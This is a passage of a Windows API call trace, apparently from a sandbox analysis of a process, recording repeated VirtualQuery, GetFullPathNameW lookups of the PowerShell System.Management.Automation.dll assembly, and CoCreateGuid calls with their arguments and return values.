	[0286.426] VirtualQuery (in: lpAddress=0x26b5f0, lpBuffer=0x26c4b0, dwLength=0x30 | out: lpBuffer=0x26c4b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.426] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x51c80fec, Data2=0xc37, Data3=0x4e9a, Data4=([0]=0x80, [1]=0x34, [2]=0xd8, [3]=0xbf, [4]=0x4c, [5]=0x5e, [6]=0x88, [7]=0xae))) returned 0x0
	[0286.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.427] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xeb0bf36a, Data2=0x4449, Data3=0x4d85, Data4=([0]=0xae, [1]=0x18, [2]=0x43, [3]=0x4c, [4]=0x68, [5]=0x16, [6]=0x8, [7]=0xd6))) returned 0x0
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.428] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4042ee2f, Data2=0xa2af, Data3=0x4dfe, Data4=([0]=0x86, [1]=0xa2, [2]=0xae, [3]=0x2f, [4]=0xa5, [5]=0xeb, [6]=0xf3, [7]=0xb1))) returned 0x0
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.429] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xffa859bd, Data2=0x8b17, Data3=0x44fc, Data4=([0]=0x98, [1]=0xe7, [2]=0x51, [3]=0xf6, [4]=0x61, [5]=0xe4, [6]=0xe6, [7]=0x81))) returned 0x0
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.430] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xbf71c025, Data2=0x5fba, Data3=0x4c70, Data4=([0]=0xa1, [1]=0xf0, [2]=0x81, [3]=0xaf, [4]=0xb8, [5]=0xa4, [6]=0x98, [7]=0x31))) returned 0x0
	[0286.431] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xdcd1caaf, Data2=0xb3da, Data3=0x4cc0, Data4=([0]=0xb4, [1]=0xfd, [2]=0x21, [3]=0xd0, [4]=0x12, [5]=0x37, [6]=0x68, [7]=0x6a))) returned 0x0
	[0286.431] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x47b157e5, Data2=0x3a4f, Data3=0x48bc, Data4=([0]=0xb4, [1]=0x57, [2]=0xfe, [3]=0x83, [4]=0xdf, [5]=0xc5, [6]=0xbd, [7]=0xbe))) returned 0x0
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.432] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x26bec3b8, Data2=0x759d, Data3=0x42f1, Data4=([0]=0xb4, [1]=0x5e, [2]=0x57, [3]=0x16, [4]=0xc7, [5]=0x6b, [6]=0x33, [7]=0xe8))) returned 0x0
	[0286.432] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.432] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.432] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.433] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.434] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.434] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.434] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.434] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.435] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.435] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.435] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.435] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.435] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
